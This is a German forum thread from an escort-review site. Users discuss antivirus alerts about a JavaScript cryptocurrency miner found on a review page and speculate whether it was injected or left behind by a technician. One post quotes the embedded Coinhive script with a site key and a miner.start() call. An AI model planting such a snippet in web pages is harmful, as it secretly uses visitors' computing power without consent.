Moin,
ich hatte grade hier im Forum auf "Hurren-Bewertung" geklickt.
Da hat mein Antivirus gleich in Trojaner (js/Miner.af) gemeldet.
Was dazu bekannt?
Moin,
ich hatte grade hier im Forum auf "Hurren-Bewertung" geklickt.
Da hat mein Antivirus gleich in Trojaner (js/Miner.af) gemeldet.
Was dazu bekannt?
Kann ich bestätigen. Mein Mining-Blocker hat "angeschlagen"!!
js-Miner klingt nach Javascript und nach Kryptowährungsschürfern.
Das sind Programme, die im Browser komplexe Rechenoperationen durchführen, um Coins für den Seitenbetreiber zu erzeugen. Normalerweise hinterlassen die keine Spuren, wenn man den Browser schliesst.
Ich vermute mal, da will sich ein Servertechniker was dazuverdienen.
Soeit ich sehe kann ist das Problem behoben. Mehr weiß ich aber im Moment auch nicht.
Mod, nicht Admin!
Hinweis: ALLE von mir beschriebenen sexuellen Handlungen haben sich NIE so zugetragen! Sie entspringen meiner kleinen schmutzigen Fantasie während eines feuchten Tagtraums und haben mit der Realität nicht das Geringste zu tun! Die SDL in meinem Geschichten und ich selbst halten sich in der Realität natürlich strikt an die Kondompflicht des ProstSchG!
Bei mir zeigt weder ublock noch bluhell etwas an.
Nutze auch Norton und mir wird nichts angezeigt.
Norton schlägt bei mir immer noch an, genau so wie im Bild oben... komisch!
Welche Version nutzt Du? Ich hab' die Versionsnr. 22.14.2.13 (Hilfe->Info)
Geändert von Mercury006 (01.07.2018 um 21:57 Uhr)
Hinweis: ALLE von mir beschriebenen sexuellen Handlungen haben sich NIE so zugetragen! Sie entspringen meiner kleinen schmutzigen Fantasie während eines feuchten Tagtraums und haben mit der Realität nicht das Geringste zu tun! Die SDL in meinem Geschichten und ich selbst halten sich in der Realität natürlich strikt an die Kondompflicht des ProstSchG!
Bei mir kommt auch nichts, also weder eine Meldung (Kaspersky), noch ist eine Auswirkung da. Getestet habe ich gerade mit Firefox, Chrome, Edge und über Virustotal.
Malwares.com findet ein Hash-Fragment, welches aber nicht aktiv ist und auch keinem Schädlicg, oder Programm zugeordnet ist, ausserdem ist der Fund vom 12.06.
Mod, nicht Admin!
auf der Seite ...
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
var miner = new CoinHive.Anonymous('EJYAju9mV24QhGXkGMkiyCDDr8q8gE tL');
miner.start();
</script>
_coinhive.com_lib_coinhive.min.js mal googeln....
Einen Virus kann man das nicht nennen, es ist ein Miner, der (hier) ungefragt CPU nutzt ( in der Theorie ).
Es sieht nicht so aus, als ob er tatsächlich ( unter W10 .B. ) seine Dienste tut.
Beim Kunden "Anonymous" kann nur spekuliert werden. Klarheit kann hier nur der Admin schaffen ( Injection oder Absicht des Seitenbetreibers ).
Geändert von schaggel (04.07.2018 um 00:44 Uhr)
Ja, das wir ein Problem mit dem Ding hatten ist ja bekannt:
https://www.tabulose-huren.com/showt...e-Crypto-Miner
Und ja, das script steht theoretisch noch drin und deshalb springen manche scanner auch an, aber der miner ist nicht mehr aktiv. Zumindest kann ich keinerlei Aktivitäten entdecken.
Mod, nicht Admin!
Also das Abschiedsgeschenk des Technikers.....
Das Teil ist eingebettet und aktiv (miner.start().
Da nicht auf allen Seiten eingebettet .... ist das Framework der Seite (sofern es eines gibt) eher nicht betroffen.
Lange Rede, kurzer Sinn. Nahezu jeder AdBlocker filtert das raus .... nur wenige AV's springen drauf an. Avast und Norton gehören dazu.
Deshalb ... Admin, nicht MOD. Sorry Heineken, nix persönliches.
Schlamprei oder Absicht an der Basis ...
Ja, aber es führt zu einer nicht aktiven Seite. Und ja, der Aufruf ist nicht auskommentiert.
Das die Huren-Bewertung auch betroffen ist wurde offensichtlich übersehen. Was aber sicher auch daran liegt, das das Ding nicht mehr aktiv ist. Nun hängt da eben noch diese Datenleiche rum.
Mod, nicht Admin!
Nu wollen wir aber nicht zanken ... das Script liegt wo es liegt (nicht im Einflussbereich des Admins) und kann gestartet werden.
Das würde ich aktiv nennen ...
Das es in der Praxis keine größere Bedrohung darstellt, bedeutet nicht, das es nicht aktiv ist.
Weil es diverse Programme abwürgen, heißt das nicht, das es "inaktiv" ist.
PS: die Foren-Uhr geht 2 Stunden nach .... Das stärkt die Theorie der "Schlampigkeit" ...
Geändert von schaggel (04.07.2018 um 01:29 Uhr)
Ist die falsche Wortwahl, da hast du Recht. Ich wollte damit sagen, das das Ding im Moment nicht "aktiv" ist. Die Seite ist tot, nicht nur die Seite wo das Ding selbst liegt, sondern die gesamte.
Mod, nicht Admin!
Lesezeichen